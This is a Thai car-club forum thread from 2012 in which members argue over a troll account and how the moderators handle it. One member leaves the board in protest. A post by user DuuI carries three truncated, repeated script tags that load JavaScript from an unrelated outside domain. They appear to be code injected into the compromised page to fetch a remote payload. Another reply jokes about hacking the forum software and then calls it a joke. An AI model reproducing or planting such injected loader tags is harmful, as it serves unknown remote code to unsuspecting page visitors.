หัวข้อนี้ถูกล็อก คุณไม่สามารถแก้ไข หรือตอบได้
eakot

เข้าร่วม: 04 พฤศจิกา 2008
ตอบ: 162

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 189
ให้คำขอบคุณ: 166

ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
อังคาร, 31 กรกฎา 2012 17:59 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
โห..........สุดติ่งเลยคับ
Juris

ชื่อเล่น: เม

เข้าร่วม: 01 ตุลา 2008
ตอบ: 780

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1697
ให้คำขอบคุณ: 1333

ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 31 กรกฎา 2012 20:12 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
ระวังจะเป็นเรื่องน้ำผึ้งหยดเดียว ไฟจะลามก็รีบดับเถอะครับ เดียวมีพรรคมีพวกกันอีก
ได้รับคำขอบคุณจาก: honeybeex7  kaisuh 
ekdanai

ชื่อเล่น: ช้าง

เข้าร่วม: 15 พฤษภาคม 2011
ตอบ: 2062

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1977
ให้คำขอบคุณ: 1004

ปี: 2001
สี: แดง รอยัล รูบี้ (มุก) (R-522P)
อังคาร, 31 กรกฎา 2012 20:19 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
เดี๋ยวส่งเข้าประกวดรางวัลตุ๊กตาทอง
inspire

เข้าร่วม: 30 พฤศจิกา 2009
ตอบ: 258

มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 189
ให้คำขอบคุณ: 98

ปี: 2005
อังคาร, 31 กรกฎา 2012 20:24 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
ผมเองก็บ้า อ่านมาได้ยันหน้าสาม 555
eakieakeakkk

ชื่อเล่น: ปลา

เข้าร่วม: 13 มีนา 2011
ตอบ: 51

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 34
ให้คำขอบคุณ: 131

สี: แดง ไฟร์เปปเปอร์ (R-507P)
อังคาร, 31 กรกฎา 2012 20:37 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
อร่อยไปเลยคู่นี้
The_One

เข้าร่วม: 30 พฤษภาคม 2010
ตอบ: 761

Guru ES
Guru ES

ได้รับคำขอบคุณ: 340
ให้คำขอบคุณ: 112

ปี: 2003
สี: ฟ้า ไอซ์บูล (เมทัลลิก) (B-506M)
อังคาร, 31 กรกฎา 2012 20:42 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
ไม่โต้ตอบกันไป กันมา  ก็จบแล้วค๊าบบบ^^
ได้รับคำขอบคุณจาก: moonoy 
mugen

เข้าร่วม: 11 มกรา 2012
ตอบ: 224

ได้รับคำขอบคุณ: 587
ให้คำขอบคุณ: 924

อังคาร, 31 กรกฎา 2012 21:15 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
ไอ้หมอนี้อีกละคราวที่แล้วก้อเอารูปผมไปเป็นรูปโปรไฟล์มัน
 นั้นสิทำไมยังล็อคอินได้อีก น่าคิดเนอะ
underhill

เข้าร่วม: 15 กันยา 2011
ตอบ: 3545

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4125
ให้คำขอบคุณ: 1677

ปี: 2002
สี: น้ำเงิน อิเทอนอล (B-96P)
อังคาร, 31 กรกฎา 2012 22:19 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
inspire พิมพ์ว่า:
ผมเองก็บ้า อ่านมาได้ยันหน้าสาม 555

ได้ไง ดึงโบยังไปได้ถึงหน้า 20+ 
DuuI

ชื่อเล่น: ดุ่ย

เข้าร่วม: 02 สิงหา 2011
ตอบ: 1128

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1182
ให้คำขอบคุณ: 1536

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 31 กรกฎา 2012 23:48 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
nocomment พิมพ์ว่า:
อยากรู้ด้วยคนรอพู่ลู้มาตอบฮัับ hahahaha

เกรียนได้โล่ห์เลยแฮะ แบบนี้ผมให้ผ่านครับ  <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></

แต่ว่าไม่ต้องรู้ซักเรื่องได้ป่าวอ่ะ เห็นอยากรู้ทุกเรื่องเลย  
cakecity10

ชื่อเล่น: เค้ก

เข้าร่วม: 30 กันยา 2011
ตอบ: 98

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 112
ให้คำขอบคุณ: 157
พุธ, 1 สิงหา 2012 00:09 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
ขอบคุณ คุณป๋อง นะคะ ที่อุตส่าห์ออกมาโพสเอาป่านนี้ มาโพสตอนที่กระทู้นี้ผ่านมาจน3หน้าแล้ว จนคนอ่านเริ่มเปลี่ยนประเด็นไปตามที่ตัวเองคิดแล้ว ซึ่งก็เป็นการกระทำของผู้ดูแลเว็ปบอร์ดนี้ เหมือนๆกับหลายๆครั้ง หลายๆกระทู้ที่เคยมีปัญหาลักษณะนี้มาแล้ว ก่อนหน้าที่เราจะมาเปิดกระทู้นี้ก็ได้พยายามสอบถามแอดมินบางท่านไปว่าในเมื่อรู้ว่า Log in GooGrien เป็นผู้มีความผิด แล้วดูจากพฤติกรรมการโพส ถ้าคนที่มีความคิด ก็รู้ว่าเป็นการป่วนกระทู้ นอกจากพวกเดียวกันที่จะดูไม่ออก สังเกตุได้จากหลายคนที่เค้าเข้ามาโพสถามต่อว่า Log inนี้ มาโพสเพื่ออะไร ขุดคุ้ยกระทู้ของคนอื่น และเป็นกระทู้ที่เปิดโดยคนๆเดียวกันมาเพื่ออะไร ไม่ใช่ว่าไม่มีใครสงสัย เพียงแต่ไม่มีใครมาเปิดกระทู้ถามเหมือนเรา ก็ได้รับคำตอบจากผู้ดูแลบอร์ดบางท่านมาว่า ใช่ เค้ามีความผิด แล้วUser ของเค้าจะทำให้ผู้ดูแลติดตามทุกโพสของเค้า ก็เลยถามต่อไปว่า แล้วในเมื่อรู้ ว่าเค้ามีความผิด แล้วการโพสก็ไม่เหมาะสม แล้วทำไมยังปล่อยให้เค้าโพสต่อไป ตรงนี้ก็ยังไม่ได้รับคำตอบ เพราะวันนั้นแชทน่าจะมีปัญหา ก็เลยเลือกที่จะมาเปิดกระทู้ถามผู้ดูแล เพราะคิดว่าการตอบผ่านกระทู้น่าจะช่วยคลายความสงสัยให้คนอื่นได้ด้วย แต่ไม่คิดว่าไอ้ตัวป่วนมันจะตามมาป่วนอีก แล้วผู้ดูแลก็นิ่งเฉย ปล่อยให้เกิดปัญหาแล้วก็ออกมาโพสต่อว่าเรา ทำให้ตัวเองดูดี ให้คนอ่านเห็นใจทีมงานผู้ดูแลเว็ปบอร์ด กลายเป็นเราผิดที่มาแสดงความคิดเห็น เอะอะก็จะแบน จะบล็อคกระทู้ ทำตัวเป็นมาเฟียเว็ปบอร์ดหรอคะ? คุณเคยบอกนะว่าโพสอะไรให้ให้เกียรติผู้ดูแลเว็บบ้าง แต่ดูข้อความของคุณสิ ให้เกียรติเราป่าว??? เราถามหน่อยนะ ว่ากระทู้นี้ เราไปว่าอะไรคุณหรอ ที่คุณมาถามว่าจะให้พวกคุณทำยังงัย เราแค่บอกว่าผู้ดูแลช่วยตรวจสอบหน่อยค่ะ แต่ถ้าคุณถามเราตอนนี้ว่าจะให้พวกคุณทำยังงัยอีก เอาเป็นว่า พวกคุณไปดูแลคนของพวกคุณให้ดีๆ อย่าให้ไปกร่างกับคนอื่นเค้าก็พอแล้วล่ะ อย่าคิดว่าเป็นบ้านของตัวเองแล้วจะทำอะไรก็ได้ เพราะเดี๋ยวทีมงานผู้ดูแลเว็บบอร์ดก็จะเหลือแต่พวกเดียวกันมาอวยกันเอง เหมือนที่เป็นอยู่ทุกวันนี้น่ะ ส่วนเรื่องที่จะแบนเราไม่ต้องลำบากหรอก ตั้งแต่วันนี้ เราขอออกจากการเป็นสมาชิก และจะไม่มีการสมัครเข้ามาใหม่ใดๆทั้งสิ้น เพราะเสียความรู้สึกกับผู้ดูแลเว็ปบอร์ดนี้มากๆ ถ้าคุณจะกรุณาก็ช่วยบล็อกกระทู้นี้ด้วยแล้วกันนะ เพราะไม่อยากให้เป็นเครื่องมือของคนบางพวกที่เข้ามาตีหน้าซื่อให้คนอื่นเห็นใจน่ะ

แก้ไขล่าสุดโดย เมื่อ พุธ, 1 สิงหา 2012 00:20, ทั้งหมด 2 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: K_series  PongpanG  kaisuh  mugen  carrimoroll 
tochi229

ชื่อเล่น: ปิ๊ป

เข้าร่วม: 28 พฤศจิกา 2010
ตอบ: 7524

Moderator
Moderator

ได้รับคำขอบคุณ: 8264
ให้คำขอบคุณ: 11555

พุธ, 1 สิงหา 2012 00:15 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
cakecity10 พิมพ์ว่า:
ขอบคุณ คุณป๋อง นะคะ ที่อุตส่าห์ออกมาโพสเอาป่านนี้ มาโพสตอนที่กระทู้นี้ผ่านมาจน3หน้าแล้ว จนคนอ่านเริ่มเปลี่ยนประเด็นไปตามที่ตัวเองคิดแล้ว ซึ่งก็เป็นการกระทำของผู้ดูแลเว็ปบอร์ดนี้  เหมือนๆกับหลายๆครั้ง หลายๆกระทู้ที่เคยมีปัญหาลักษณะนี้มาแล้ว ก่อนหน้าที่เราจะมาเปิดกระทู้นี้ก็ได้พยายามสอบถามแอดมินบางท่านไปว่าในเมื่อรู้ว่า Log in GooGrien เป็นผู้มีความผิด แล้วดูจากพฤติกรรมการโพส ถ้าคนที่มีความคิด ก็รู้ว่าเป็นการป่วนกระทู้ นอกจากพวกเดียวกันที่จะดูไม่ออก สังเกตุได้จากหลายคนที่ที่เค้าเข้ามาโพสถามต่อว่า Log inนี้ มาโพสเพื่ออะไร ขุดคุ้ยกระทู้ของคนอื่น และเป็นกระทู้ที่เปิดโดยคนๆเดียวกันมาเพื่ออะไร ไม่ใช่ว่าไม่มีใครสงสัย เพียงแต่ไม่มีใครมาเปิดกระทู้ถามเหมือนเรา ก็ได้รับคำตอบจากผู้ดูแลบอร์ดบางท่านมาว่า ใช่ เค้ามีความผิด แล้วUser ของเค้าจะทำให้ผู้ดูแลติดตามทุกโพสของเค้า ก็เลยถามต่อไปว่า แล้วในเมื่อรู้ ว่าเค้ามีความผิด แล้วการโพสก็ไม่เหมาะสม แล้วทำไมยังปล่อยให้เค้าโพสต่อไป ตรงนี้ก็ยังไม่ได้รับคำตอบ เพราะวันนั้นแชทน่าจะมีปัญหา ก็เลยเลือกที่จะมาเปิดกระทู้ถามผู้ดูแล เพราะคิดว่าการตอบผ่านกระทู้น่าจะช่วยคลายความสงสัยให้คนอื่นได้ด้วย แต่ไม่คิดว่าไอ้ตัวป่วนมันจะตามมาป่วนอีก แล้วผู้ดูแลก็นิ่งเฉย ปล่อยให้เกิดปัญหาแล้วก็ออกมาโพสต่อว่าเรา ทำให้ตัวเองดูดี ให้คนอ่านเห็นใจทีมงานผู้ดูแลเว็ปบอร์ด กลายเป็นเราผิดที่มาแสดงความคิดเห็น เอะอะก็จะแบน จะบล็อคกระทู้ ทำตัวเป็นมาเฟียเว็ปบอร์ดหรอคะ  คุณเคยบอกนะว่าโพสอะไรให้ให้เกียรติผู้ดูแลเว็บบ้าง แต่ดูข้อความของคุณสิ ให้เกียรติเราป่าว??? เราถามหน่อยนะ ว่ากระทู้นี้ เราไปว่าอะไรคุณหรอ ที่คุณมาถามว่าจะให้พวกคุณทำยังงัย เราแค่บอกว่าผู้ดูแลช่วยตรวจสอบหน่อยค่ะ แต่ถ้าคุณถามเราตอนนี้ว่าจะให้พวกคุณทำยังงัยอีก เอาเป็นว่า พวกคุณไปดูแลคนของพวกคุณให้ดีๆ อย่าให้ไปกร่างกับคนอื่นเค้าก็พอแล้วล่ะ อย่าคิดว่าเป็นบ้านของตัวเองแล้วจะทำอะไรก็ได้ เพราะเดี๋ยวทีมงานผู้ดูแลเว็บบอร์ดก็จะเหลือแต่พวกเดียวกันมาอวยกันเอง เหมือนที่เป็นอยู่ทุกวันนี้น่ะ ส่วนเรื่องที่จะแบนเราไม่ต้องลำบากหรอก ตั้งแต่วันนี้ เราขอออกจากการเป็นสมาชิก และจะไม่มีการสมัครเข้ามาใหม่ใดๆทั้งสิ้น เพราะเสียความรู้สึกกับผู้ดูแลเว็ปบอร์ดนี้มากๆ ถ้าคุณจะกรุณาก็ช่วยบล็อกกระทู้นี้ด้วยแล้วกันนะ เพราะไม่อยากให้เป็นเครื่องมือของคนบางพวกที่เข้ามาตีหน้าซื่อให้คนอื่นเห็นใจน่ะ

ใจเย็น ๆ ก่อนนะครับ
ได้รับคำขอบคุณจาก: K_series  mugen 
K_series

ตอบ: 3032

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 22059
ให้คำขอบคุณ: 6045
พุธ, 1 สิงหา 2012 00:17 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
ขอบคุณ คุณป๋อง นะคะ ที่อุตส่าห์ออกมาโพสเอาป่านนี้ มาโพสตอนที่กระทู้นี้ผ่านมาจน3หน้าแล้ว จนคนอ่านเริ่มเปลี่ยนประเด็นไปตามที่ตัวเองคิดแล้ว ซึ่งก็เป็นการกระทำของผู้ดูแลเว็ปบอร์ดนี้  เหมือนๆกับหลายๆครั้ง หลายๆกระทู้ที่เคยมีปัญหาลักษณะนี้มาแล้ว ก่อนหน้าที่เราจะมาเปิดกระทู้นี้ก็ได้พยายามสอบถามแอดมินบางท่านไปว่าในเมื่อรู้ว่า Log in GooGrien เป็นผู้มีความผิด แล้วดูจากพฤติกรรมการโพส ถ้าคนที่มีความคิด ก็รู้ว่าเป็นการป่วนกระทู้ นอกจากพวกเดียวกันที่จะดูไม่ออก สังเกตุได้จากหลายคนที่ที่เค้าเข้ามาโพสถามต่อว่า Log inนี้ มาโพสเพื่ออะไร ขุดคุ้ยกระทู้ของคนอื่น และเป็นกระทู้ที่เปิดโดยคนๆเดียวกันมาเพื่ออะไร ไม่ใช่ว่าไม่มีใครสงสัย เพียงแต่ไม่มีใครมาเปิดกระทู้ถามเหมือนเรา ก็ได้รับคำตอบจากผู้ดูแลบอร์ดบางท่านมาว่า ใช่ เค้ามีความผิด แล้วUser ของเค้าจะทำให้ผู้ดูแลติดตามทุกโพสของเค้า ก็เลยถามต่อไปว่า แล้วในเมื่อรู้ ว่าเค้ามีความผิด แล้วการโพสก็ไม่เหมาะสม แล้วทำไมยังปล่อยให้เค้าโพสต่อไป ตรงนี้ก็ยังไม่ได้รับคำตอบ เพราะวันนั้นแชทน่าจะมีปัญหา ก็เลยเลือกที่จะมาเปิดกระทู้ถามผู้ดูแล เพราะคิดว่าการตอบผ่านกระทู้น่าจะช่วยคลายความสงสัยให้คนอื่นได้ด้วย แต่ไม่คิดว่าไอ้ตัวป่วนมันจะตามมาป่วนอีก แล้วผู้ดูแลก็นิ่งเฉย ปล่อยให้เกิดปัญหาแล้วก็ออกมาโพสต่อว่าเรา ทำให้ตัวเองดูดี ให้คนอ่านเห็นใจทีมงานผู้ดูแลเว็ปบอร์ด กลายเป็นเราผิดที่มาแสดงความคิดเห็น เอะอะก็จะแบน จะบล็อคกระทู้ ทำตัวเป็นมาเฟียเว็ปบอร์ดหรอคะ  คุณเคยบอกนะว่าโพสอะไรให้ให้เกียรติผู้ดูแลเว็บบ้าง แต่ดูข้อความของคุณสิ ให้เกียรติเราป่าว??? เราถามหน่อยนะ ว่ากระทู้นี้ เราไปว่าอะไรคุณหรอ ที่คุณมาถามว่าจะให้พวกคุณทำยังงัย เราแค่บอกว่าผู้ดูแลช่วยตรวจสอบหน่อยค่ะ แต่ถ้าคุณถามเราตอนนี้ว่าจะให้พวกคุณทำยังงัยอีก เอาเป็นว่า พวกคุณไปดูแลคนของพวกคุณให้ดีๆ อย่าให้ไปกร่างกับคนอื่นเค้าก็พอแล้วล่ะ อย่าคิดว่าเป็นบ้านของตัวเองแล้วจะทำอะไรก็ได้ เพราะเดี๋ยวทีมงานผู้ดูแลเว็บบอร์ดก็จะเหลือแต่พวกเดียวกันมาอวยกันเอง เหมือนที่เป็นอยู่ทุกวันนี้น่ะ ส่วนเรื่องที่จะแบนเราไม่ต้องลำบากหรอก ตั้งแต่วันนี้ เราขอออกจากการเป็นสมาชิก และจะไม่มีการสมัครเข้ามาใหม่ใดๆทั้งสิ้น เพราะเสียความรู้สึกกับผู้ดูแลเว็ปบอร์ดนี้มากๆ ถ้าคุณจะกรุณาก็ช่วยบล็อกกระทู้นี้ด้วยแล้วกันนะ เพราะไม่อยากให้เป็นเครื่องมือของคนบางพวกที่เข้ามาตีหน้าซื่อให้คนอื่นเห็นใจน่ะ

ว่าแล้วสุดท้ายผู้ดูแลก้อโดนอีก
ได้รับคำขอบคุณจาก: tokykung  PAE KUNG  Turngkung P 11  TUI_PeTiTe  hikaru_kung  carrimoroll 
pairach_c

ชื่อเล่น: ต๋อย

เข้าร่วม: 12 พฤษภาคม 2010
ตอบ: 213

ได้รับคำขอบคุณ: 348
ให้คำขอบคุณ: 354

พุธ, 1 สิงหา 2012 00:49 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
อ่านแรกขำๆฮาๆ แต่มาข้อความสุดท้าย
โอ้วว เรื่องมาถึงขนาดนี้กันเลย...

LifeFate

เข้าร่วม: 08 พฤศจิกา 2011
ตอบ: 3153

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5152
ให้คำขอบคุณ: 215

พุธ, 1 สิงหา 2012 01:08 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
ปัญญาชน คิคิ
domino

ชื่อเล่น: คิว

เข้าร่วม: 05 กรกฎา 2012
ตอบ: 57

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 70
ให้คำขอบคุณ: 47

พุธ, 1 สิงหา 2012 01:44 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
แตกต่าง แต่ไม่ แตกแยก ดีกว่ามั้ยครับพี่ๆจากสมาชิกใหม่ ครับ
ได้รับคำขอบคุณจาก: K_series 
Ton-

เข้าร่วม: 02 ตุลา 2008
ตอบ: 1397

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5467
ให้คำขอบคุณ: 1471
พุธ, 1 สิงหา 2012 06:06 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
นาย googrien มาโพสท์เพราะความเกรียน แต่คุณ cakecity เอามาคิดไปเองโน่นนี่ สุดท้ายมาพาลกับ admin จนตัวเองขอออกจากบอร์ดไปเอง

ป่านนี้นาย googrien นั่งหัวเราะท้องแข็งแล้วมั๊ง ลองเอาไปคิดให้ดีๆ

หลายๆเรื่องที่ผ่านมาในชีวิตก็หัดปล่อยวางบ้างเถอะครับ
ได้รับคำขอบคุณจาก: tokykung  zan  K_series  aeae..  Juris  pja  underhill  wut-chiangmai  kaisuh  MayBe  PAE KUNG  Turngkung P 11  NeaT ES.  hikaru_kung  moonoy  koobe  battery3k  boss 
ES2.0

ชื่อเล่น: ปาล์ม

เข้าร่วม: 17 เมษา 2009
ตอบ: 1013

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1027
ให้คำขอบคุณ: 1000

สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
พุธ, 1 สิงหา 2012 06:32 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
ปล่อยวางกันซะบ้างเถอะคับต่างคนต่างมีหน้าที่ของตัวเองแอดมินคงไม่ได้มีเวลามานั่งเฝ้าบอร์ด
ปรึกษาหารือกันด้วยเรื่องคนๆเดียวหรอกนะ เค้าคงมีงานมีการทำอย่างอื่นเป็นหลักเหมือนหลายๆคน
นั่นแหละ มาอยุ่ดูแลที่นี่เป็นหน้าที่เสริมที่ไม่มีรายได้เพิ่มเติม ไม่ว่าจะคนที่ป่วนหรือคนที่รำคาญ
ควรจะมีมารยาทในการโพส และเคารพกฏกติกากันบ้างนะคับ อยากให้บ้านนี้อบอุ่นเหมือนเดิมแค่นั้น
ได้รับคำขอบคุณจาก: tokykung  underhill  wut-chiangmai  oat99  hikaru_kung  battery3k 
oatto

ชื่อเล่น: โอ๊ต

เข้าร่วม: 17 มิถุนา 2011
ตอบ: 234

ได้รับคำขอบคุณ: 218
ให้คำขอบคุณ: 81

พุธ, 1 สิงหา 2012 06:58 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
ผมไปเรียนหาสาระความรู้ก่อนนะครับพี่ อีก 2 เดือนผมจบแล้วจะกลับมาดูกระทู้นี้ใหม่
ได้รับคำขอบคุณจาก: K_series  Nung_Sodapop  Turngkung P 11  hikaru_kung 
zan

เข้าร่วม: 23 สิงหา 2009
ตอบ: 3145

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3432
ให้คำขอบคุณ: 6687

พุธ, 1 สิงหา 2012 07:49 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
Ton- พิมพ์ว่า:
นาย googrien มาโพสท์เพราะความเกรียน แต่คุณ cakecity เอามาคิดไปเองโน่นนี่ สุดท้ายมาพาลกับ admin จนตัวเองขอออกจากบอร์ดไปเอง

ป่านนี้นาย googrien นั่งหัวเราะท้องแข็งแล้วมั๊ง ลองเอาไปคิดให้ดีๆ

หลายๆเรื่องที่ผ่านมาในชีวิตก็หัดปล่อยวางบ้างเถอะครับ

กลายเป็น . . . . เหยื่ออารมณ์
ได้รับคำขอบคุณจาก: honeybeex7  ค้าอะไหล่โคตรเก่า  Juris  wut-chiangmai  hikaru_kung 
nuibigjoke

ชื่อเล่น: หนุ่ย

เข้าร่วม: 11 เมษา 2012
ตอบ: 73

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 24
ให้คำขอบคุณ: 2

สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 1 สิงหา 2012 07:55 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
ขอบคุณ คุณป๋อง นะคะ ที่อุตส่าห์ออกมาโพสเอาป่านนี้ มาโพสตอนที่กระทู้นี้ผ่านมาจน3หน้าแล้ว จนคนอ่านเริ่มเปลี่ยนประเด็นไปตามที่ตัวเองคิดแล้ว ซึ่งก็เป็นการกระทำของผู้ดูแลเว็ปบอร์ดนี้ เหมือนๆกับหลายๆครั้ง หลายๆกระทู้ที่เคยมีปัญหาลักษณะนี้มาแล้ว ก่อนหน้าที่เราจะมาเปิดกระทู้นี้ก็ได้พยายามสอบถามแอดมินบางท่านไปว่าในเมื่อรู้ว่า Log in GooGrien เป็นผู้มีความผิด แล้วดูจากพฤติกรรมการโพส ถ้าคนที่มีความคิด ก็รู้ว่าเป็นการป่วนกระทู้ นอกจากพวกเดียวกันที่จะดูไม่ออก สังเกตุได้จากหลายคนที่เค้าเข้ามาโพสถามต่อว่า Log inนี้ มาโพสเพื่ออะไร ขุดคุ้ยกระทู้ของคนอื่น และเป็นกระทู้ที่เปิดโดยคนๆเดียวกันมาเพื่ออะไร ไม่ใช่ว่าไม่มีใครสงสัย เพียงแต่ไม่มีใครมาเปิดกระทู้ถามเหมือนเรา ก็ได้รับคำตอบจากผู้ดูแลบอร์ดบางท่านมาว่า ใช่ เค้ามีความผิด แล้วUser ของเค้าจะทำให้ผู้ดูแลติดตามทุกโพสของเค้า ก็เลยถามต่อไปว่า แล้วในเมื่อรู้ ว่าเค้ามีความผิด แล้วการโพสก็ไม่เหมาะสม แล้วทำไมยังปล่อยให้เค้าโพสต่อไป ตรงนี้ก็ยังไม่ได้รับคำตอบ เพราะวันนั้นแชทน่าจะมีปัญหา ก็เลยเลือกที่จะมาเปิดกระทู้ถามผู้ดูแล เพราะคิดว่าการตอบผ่านกระทู้น่าจะช่วยคลายความสงสัยให้คนอื่นได้ด้วย แต่ไม่คิดว่าไอ้ตัวป่วนมันจะตามมาป่วนอีก แล้วผู้ดูแลก็นิ่งเฉย ปล่อยให้เกิดปัญหาแล้วก็ออกมาโพสต่อว่าเรา ทำให้ตัวเองดูดี ให้คนอ่านเห็นใจทีมงานผู้ดูแลเว็ปบอร์ด กลายเป็นเราผิดที่มาแสดงความคิดเห็น เอะอะก็จะแบน จะบล็อคกระทู้ ทำตัวเป็นมาเฟียเว็ปบอร์ดหรอคะ? คุณเคยบอกนะว่าโพสอะไรให้ให้เกียรติผู้ดูแลเว็บบ้าง แต่ดูข้อความของคุณสิ ให้เกียรติเราป่าว??? เราถามหน่อยนะ ว่ากระทู้นี้ เราไปว่าอะไรคุณหรอ ที่คุณมาถามว่าจะให้พวกคุณทำยังงัย เราแค่บอกว่าผู้ดูแลช่วยตรวจสอบหน่อยค่ะ แต่ถ้าคุณถามเราตอนนี้ว่าจะให้พวกคุณทำยังงัยอีก เอาเป็นว่า พวกคุณไปดูแลคนของพวกคุณให้ดีๆ อย่าให้ไปกร่างกับคนอื่นเค้าก็พอแล้วล่ะ อย่าคิดว่าเป็นบ้านของตัวเองแล้วจะทำอะไรก็ได้ เพราะเดี๋ยวทีมงานผู้ดูแลเว็บบอร์ดก็จะเหลือแต่พวกเดียวกันมาอวยกันเอง เหมือนที่เป็นอยู่ทุกวันนี้น่ะ ส่วนเรื่องที่จะแบนเราไม่ต้องลำบากหรอก ตั้งแต่วันนี้ เราขอออกจากการเป็นสมาชิก และจะไม่มีการสมัครเข้ามาใหม่ใดๆทั้งสิ้น เพราะเสียความรู้สึกกับผู้ดูแลเว็ปบอร์ดนี้มากๆ ถ้าคุณจะกรุณาก็ช่วยบล็อกกระทู้นี้ด้วยแล้วกันนะ เพราะไม่อยากให้เป็นเครื่องมือของคนบางพวกที่เข้ามาตีหน้าซื่อให้คนอื่นเห็นใจน่ะ

บอกผู้ดูแลแล้วท่านไม่แบนให้ ก็ hack phpbb แล้วเข้าไปแบนเองซะเลยเป็นไงครับ ดีกว่าเนอะๆๆๆ 

ผมล้อเล่นน้าาาาาาาาาาา
K_series

ครอบครัว ES
ครอบครัว ES

พุธ, 1 สิงหา 2012 08:14 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
สวัสดีวันพุธ ที่1 สิงหาคม 2555 ที่ราชพฤกษ์

เห็นเถียงกันอย่างออกรสออกชาติคิดว่ากำลังมันส์อยู่ซะอีก

คอมก้อของคุณ คีบอร์ดก้อของคุณ พิมพ์เถียงกันคุณก้อพิมพ์เอง

พอมีปัญหามาว่ามาเฟียฉอดๆว่าไม่ทำไรเลย พอมาเฟียแก้ปัญหาถ้าไม่ถูกใจก้อด่าอีกรอบ

มีกระทู้เหน็บแนมกันออกหน้าออกตา อัพกันจัง

สุดท้ายนี้จะตัดสินใจยังไงก้อแล้วแต่คุณละครับ แต่ถ้าว่างอาจจะเข้ามาช่วยอัพกระทู้ให้

เพราะผมชอบมากกกกกกก (คุ้นๆเนอะคำนี้)
ได้รับคำขอบคุณจาก: honeybeex7  EAK_75  Juris  tokykung  underhill  NeaT ES.  boyboom_16  MayBe  Nung_Sodapop  PAE KUNG  zan  Turngkung P 11  TUI_PeTiTe  hikaru_kung  hacker  nayyai1  stevie_b8  battery3k  moonoy  patoo  mugen  boss  carrimoroll 
K_series

ครอบครัว ES
ครอบครัว ES

พุธ, 1 สิงหา 2012 08:22 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
ฝากไปถึงบุคคลเบื้องหลังทั้งหลายไปเลยก้อแล้วกัน

ถ้าไม่พอใจในระบบที่เป็นอยู่ปัจจุบัน

ในรอบการเลือกตั้งประธานคลับครั้งต่อไปช่วยมาลงสมัครกันเยอะๆนะครับ

แล้วมาลองดูเอาเองว่าทำงานกันยังไง แล้วจะทำได้มั้ย

พรรคพวกผมที่ชอบอวยกันเองอยู่เนี่ย จะได้ขอกลับไปเป็นสมาชิกธรรมดาๆบ้าง

ว่างก้อไปมีตติ้ง ไม่ว่างก้อไม่ไป ถ้าจัดไกลๆหน่อยขี้เกียจไปจะมีตติ้งกันเองแถวบ้านนี่แหละ

แบบนั้นสบายดีครับผมชอบ
hacker

ชื่อเล่น: เซียนจ๊อบ

เข้าร่วม: 03 ตุลา 2008
ตอบ: 4046

ผู้ชนะเลิศการแข่งขัน ES Drag war 2011
ผู้ชนะเลิศการแข่งขัน ES Drag war 2011

ได้รับคำขอบคุณ: 10965
ให้คำขอบคุณ: 22797

พุธ, 1 สิงหา 2012 08:24 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
mugen พิมพ์ว่า:
ไอ้หมอนี้อีกละคราวที่แล้วก้อเอารูปผมไปเป็นรูปโปรไฟล์มัน
 นั้นสิทำไมยังล็อคอินได้อีก น่าคิดเนอะ

มันผิดกฏข้อไหนครับ อันนี้เอาจริงๆ ผู้ดูแลก็ไม่รู้ว่ารูปใครเป็นใคร รู้แต่คน บางคนเอารูปมิยาบิมายังมีเลย จะแบนเค้าก็ต้องมีเหตุผล

